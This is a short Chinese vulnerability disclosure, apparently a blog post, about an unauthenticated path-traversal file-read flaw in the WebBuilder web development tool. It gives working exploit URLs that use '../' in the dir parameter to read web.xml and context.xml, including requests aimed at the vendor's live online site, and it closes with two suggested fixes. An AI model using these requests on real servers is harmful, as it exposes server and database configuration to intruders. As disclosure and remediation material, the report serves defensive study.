开源Web应用开发工具WebBuilder存在任意文件读取漏洞,可泄露服务器及数据库配置等关键信息。 代码中存在方法可以由用户控制路径读取文件:
查看数据库,调用此方法的xwl不需要登录验证,没有获取权限的情况下也可以访问:
于是,访问这个URL: 代码读取文件的的路径,是webbuilder/docs/,先尝试访问该文件夹下文件: http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@index.txt 修改dir参数,没有过滤../,比如提交web.xml路径: http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml 再试一个: http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml 在WebBuilder官方的在线使用站上测试一下: http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml
修复方案:1.过滤../。 2.读取文件时,对目录进行检验。 |
-
上一篇: 蚕豆网应用管理后台SQL注射可导致全站挂马 - 网
下一篇: FengCms过滤不言导致sql注入,可爆管理用户名密码
还没有人抢沙发呢~